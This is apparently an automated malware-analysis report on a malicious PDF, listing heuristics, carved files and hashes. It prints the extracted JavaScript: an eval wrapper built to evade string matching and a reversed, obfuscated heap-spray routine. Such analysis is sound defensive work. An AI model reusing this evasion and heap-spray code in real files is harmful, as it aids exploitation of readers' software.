MALICIOUS (Risk Score 68)

Malware Insights

MITRE ATT&CK
- T1059.001 PowerShell
- T1566.002 Spearphishing Attachment
The PDF was flagged by a machine learning classifier with high confidence as malicious. Static analysis revealed embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics, and an extracted JavaScript file. The presence of JavaScript within a PDF commonly indicates an attempt to execute malicious code, such as downloading a second-stage payload from an embedded URL. The ML_NYX_PDF_MALICIOUS heuristic strongly supports this assessment.
Machine Learning
- Nyx PDF Classifier: malicious score 0.9996
Heuristics (4)
- Suspicious extracted artifact (medium) EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- JavaScript action (low, 1 related finding) PDF_JAVASCRIPT: PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Embedded JS stream (low) PDF_JS: PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Embedded URL (info) EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://www.bitstream.com (in PDF document text)
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| javascript_obj0012_000.js | pdf-javascript-stream | PDF /JS object 12 at offset 0x104F0 | 3686 bytes | 6d6dce08411ff543b78f0bb3e251b4fe9d117e4067d8387638ee0f96deb1631d |
| font_00_sfnt_off00000319.bin | pdf-font-stream | PDF embedded font (sfnt) at offset 0x319 | 65932 bytes | 67cf5b115c479e7cc69ef02607414d718125a1e117a59d537db3e97682d5b723 |

javascript_obj0012_000.js

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 1 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).

Preview script (first 1,000 lines of the extracted script):

```javascript
// Builds an eval wrapper via Function("a", "eval(a);"): the "ev al" split/join
// keeps the literal token "eval" out of the source so simple string matching misses it.
var eva=new Function("a","ev al (a);".split(" ").join(""));
// The payload is stored reversed; read right-to-left it declares a percent-encoded blob
// (lp), rebuilds it into a string, unescape()s it, and doubles a "%u0c0c" pattern into
// large strings in a loop, which is a heap-spray construction.
var s=' ;"s"+3_ozotlav=]i_ozotlav[4_ozotlav )++i_ozotlav;0f1x0<i_ozotlav;0=i_ozotlav( rof ;)(yarrA wen = 4_ozotlav rav ;)2 / )80x0-0201x0( - 00008x0 ,0(gnirtsbus.d_ozotlav = 3_ozotlav ;d_ozotlav =+ d_ozotlav )00008x0 < htgnel.d_ozotlav(elihw ;)2/63556 ,0(gnirtsbus.b_ozotlav = d_ozotlav ;c_ozotlav =+ b_ozotlav ;olygak =+ b_ozotlav ;)2/)42x0-c0c0x0( ,0(gnirtsbus.c_ozotlav = b_ozotlav ;c_ozotlav=+c_ozotlav )63556 < 8 + 02 + htgnel.c_ozotlav( elihw ;) "c" + "0" + "c" + "0" + "u" + "%" + "c" + "0" + "c" + "0" + "u" + "%" (epak = c_ozotlav rav ;) ipmet (epak = olygak rav ;epacsenu = epak rav } } ]j[lp =+ ipmet esle ;"%" =+ ipmet )"Q" == ]j[lp( fi { )"P" =! ]j[lp( fi { )++j;htgnel.lp<j;0=j( rof ;"" = ipmet rav ;"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" = lp rav ';
// Reverse the string back into source order and execute it through the eval wrapper.
eva(s.split("").reverse().join(""));
```

font_00_sfnt_off00000319.bin

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. Static shellcode analysis found candidate code region(s). Indicators: heap spray 0x41 (A)